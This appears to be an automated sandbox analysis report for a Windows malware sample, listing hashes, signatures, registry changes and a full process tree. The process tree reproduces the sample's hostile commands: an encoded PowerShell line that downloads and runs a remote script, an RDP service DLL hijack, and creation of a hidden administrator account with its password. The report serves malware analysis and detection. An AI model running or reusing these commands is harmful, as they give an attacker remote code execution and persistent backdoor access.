Resubmissions (submitted, task ID, score)
02-09-2021 16:57  210902-vgpzjadhhn  10
02-09-2021 16:25  210902-tw1h5sage4  10
02-09-2021 11:31  210902-9dk89x9wb2  10
14-08-2021 13:56  210814-xdxpv1yk2x  10

Analysis
Max time kernel: 1665s
Max time network: 1733s
Platform: windows10_x64
Resource: win10v20210408
Submitted: 02-09-2021 16:57
Static task: static1
Behavioral task: behavioral1
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win10v20210408
General
Target: 472208d7ba18d4c14b7e90b9db5d6feb.exe
Size: 5.9MB
MD5: 472208d7ba18d4c14b7e90b9db5d6feb
SHA1: ff24cc43998ff99e61b1a838e1d51c4888498935
SHA256: ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
SHA512: 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes (flow, pid, process):
  17  3920  powershell.exe
  19  3920  powershell.exe
  20  3920  powershell.exe
  21  3920  powershell.exe
  23  3920  powershell.exe
  25  3920  powershell.exe
  27  3920  powershell.exe
  29  3920  powershell.exe
  31  3920  powershell.exe
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes (resource, yara_rule):
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
Loads dropped DLL 2 IoCs
Processes (pid, process):
  2052  2052
Drops file in Program Files directory 4 IoCs
Processes (description, ioc, process):
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
Drops file in Windows directory 19 IoCs
Processes (description, ioc, process):
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  powershell.exe
  File created  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mrbjh4nt.5sl.psm1  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7BC.tmp  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7FC.tmp  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_o5pexc1t.zjm.ps1  powershell.exe
  File created  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File created  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC80D.tmp  powershell.exe
  File created  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC73D.tmp  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC79C.tmp  powershell.exe
  File created  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
Modifies data under HKEY_USERS 64 IoCs
Processes (description, ioc, process):
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup (powershell.exe)
  Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" (powershell.exe)
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
  HTTP User-Agent header  19  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  20  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  21  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  23  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes (pid, process; each pid listed three times in the report):
  3144  powershell.exe (x3)
  2484  powershell.exe (x3)
  732   powershell.exe (x3)
  2784  powershell.exe (x3)
  3144  powershell.exe (x3)
  3920  powershell.exe (x3)
Suspicious behavior: LoadsDriver 2 IoCs
Processes (pid, process):
  608  608
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 568 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 3144 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeIncreaseQuotaPrivilege 2484 powershell.exe Token: SeSecurityPrivilege 2484 powershell.exe Token: SeTakeOwnershipPrivilege 2484 powershell.exe Token: SeLoadDriverPrivilege 2484 powershell.exe Token: SeSystemProfilePrivilege 2484 powershell.exe Token: SeSystemtimePrivilege 2484 powershell.exe Token: SeProfSingleProcessPrivilege 2484 powershell.exe Token: SeIncBasePriorityPrivilege 2484 powershell.exe Token: SeCreatePagefilePrivilege 2484 powershell.exe Token: SeBackupPrivilege 2484 powershell.exe Token: SeRestorePrivilege 2484 powershell.exe Token: SeShutdownPrivilege 2484 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeSystemEnvironmentPrivilege 2484 powershell.exe Token: SeRemoteShutdownPrivilege 2484 powershell.exe Token: SeUndockPrivilege 2484 powershell.exe Token: SeManageVolumePrivilege 2484 powershell.exe Token: 33 2484 powershell.exe Token: 34 2484 powershell.exe Token: 35 2484 powershell.exe Token: 36 2484 powershell.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeIncreaseQuotaPrivilege 732 powershell.exe Token: SeSecurityPrivilege 732 powershell.exe Token: SeTakeOwnershipPrivilege 732 powershell.exe Token: SeLoadDriverPrivilege 732 powershell.exe Token: SeSystemProfilePrivilege 732 powershell.exe Token: SeSystemtimePrivilege 732 powershell.exe Token: SeProfSingleProcessPrivilege 732 powershell.exe Token: SeIncBasePriorityPrivilege 732 powershell.exe Token: SeCreatePagefilePrivilege 732 powershell.exe Token: SeBackupPrivilege 732 powershell.exe Token: SeRestorePrivilege 732 powershell.exe Token: SeShutdownPrivilege 732 powershell.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeSystemEnvironmentPrivilege 732 powershell.exe Token: 
SeRemoteShutdownPrivilege 732 powershell.exe Token: SeUndockPrivilege 732 powershell.exe Token: SeManageVolumePrivilege 732 powershell.exe Token: 33 732 powershell.exe Token: 34 732 powershell.exe Token: 35 732 powershell.exe Token: 36 732 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeIncreaseQuotaPrivilege 2784 powershell.exe Token: SeSecurityPrivilege 2784 powershell.exe Token: SeTakeOwnershipPrivilege 2784 powershell.exe Token: SeLoadDriverPrivilege 2784 powershell.exe Token: SeSystemProfilePrivilege 2784 powershell.exe Token: SeSystemtimePrivilege 2784 powershell.exe Token: SeProfSingleProcessPrivilege 2784 powershell.exe Token: SeIncBasePriorityPrivilege 2784 powershell.exe Token: SeCreatePagefilePrivilege 2784 powershell.exe Token: SeBackupPrivilege 2784 powershell.exe Token: SeRestorePrivilege 2784 powershell.exe Token: SeShutdownPrivilege 2784 powershell.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeSystemEnvironmentPrivilege 2784 powershell.exe Token: SeRemoteShutdownPrivilege 2784 powershell.exe Token: SeUndockPrivilege 2784 powershell.exe Token: SeManageVolumePrivilege 2784 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes (pid wrote to memory of target pid; process -> target process; each entry recorded twice in the report):
  568 -> 3144   472208d7ba18d4c14b7e90b9db5d6feb.exe -> powershell.exe (x2)
  3144 -> 496   powershell.exe -> csc.exe (x2)
  496 -> 760    csc.exe -> cvtres.exe (x2)
  3144 -> 2484  powershell.exe -> powershell.exe (x2)
  3144 -> 732   powershell.exe -> powershell.exe (x2)
  3144 -> 2784  powershell.exe -> powershell.exe (x2)
  3144 -> 3560  powershell.exe -> reg.exe (x2)
  3144 -> 1592  powershell.exe -> reg.exe (x2)
  3144 -> 2776  powershell.exe -> reg.exe (x2)
  3144 -> 2172  powershell.exe -> net.exe (x2)
  2172 -> 2972  net.exe -> net1.exe (x2)
  3144 -> 732   powershell.exe -> cmd.exe (x2)
  732 -> 1192   cmd.exe -> cmd.exe (x2)
  1192 -> 3852  cmd.exe -> net.exe (x2)
  3852 -> 3984  net.exe -> net1.exe (x2)
  3144 -> 2792  powershell.exe -> cmd.exe (x2)
  2792 -> 2912  cmd.exe -> cmd.exe (x2)
  2912 -> 3864  cmd.exe -> net.exe (x2)
  3864 -> 3264  net.exe -> net1.exe (x2)
  2268 -> 2900  cmd.exe -> net.exe (x2)
  2900 -> 3168  net.exe -> net1.exe (x2)
  3832 -> 2476  cmd.exe -> net.exe (x2)
  2476 -> 3560  net.exe -> net1.exe (x2)
  1860 -> 4044  cmd.exe -> net.exe (x2)
  4044 -> 756   net.exe -> net1.exe (x2)
  1644 -> 1420  cmd.exe -> net.exe (x2)
  1420 -> 1504  net.exe -> net1.exe (x2)
  3836 -> 3156  cmd.exe -> net.exe (x2)
  3156 -> 3752  net.exe -> net1.exe (x2)
  2248 -> 188   cmd.exe -> net.exe (x2)
  188 -> 3972   net.exe -> net1.exe (x2)
  2484 -> 2244  cmd.exe -> WMIC.exe (x2)
Processes (tree depth in brackets; the sandbox reuses PIDs across entries, e.g. 732, 2484, 2784, 3560, 1192, 2268, 188, 2792, 3864 each appear for more than one process)

[1] C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
    PID 568; flags: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      PID 3144; flags: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\khb00ypm\khb00ypm.cmdline"
        PID 496; flags: Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6363.tmp" "c:\Users\Admin\AppData\Local\Temp\khb00ypm\CSC662AA544276048D0A04263C9CC1ECCAF.TMP"
          PID 760
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID 2484; flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID 732; flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID 2784; flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        PID 3560
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        PID 1592; flags: Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        PID 2776
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID 2172; flags: Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          PID 2972
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        PID 732; flags: Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          PID 1192; flags: Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            PID 3852; flags: Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
              PID 3984
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        PID 2792; flags: Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
          PID 2912; flags: Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
            PID 3864; flags: Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
              PID 3264
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        PID 2268
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        PID 188

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del
    PID 2268; flags: Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user WgaUtilAcc 000000 /del
      PID 2900; flags: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
        PID 3168

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc 1fp0fXTo /add
    PID 3832; flags: Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user WgaUtilAcc 1fp0fXTo /add
      PID 2476; flags: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo /add
        PID 3560

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    PID 1860; flags: Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      PID 4044; flags: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
        PID 756

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    PID 1644; flags: Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
      PID 1420; flags: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
        PID 1504

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    PID 3836; flags: Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      PID 3156; flags: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
        PID 3752

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc 1fp0fXTo
    PID 2248; flags: Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user WgaUtilAcc 1fp0fXTo
      PID 188; flags: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo
        PID 3972

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
    PID 2484; flags: Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name
      PID 2244

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
    PID 1508
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME
      PID 2816; flags: Modifies data under HKEY_USERS

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID 1192
  [2] C:\Windows\system32\cmd.exe
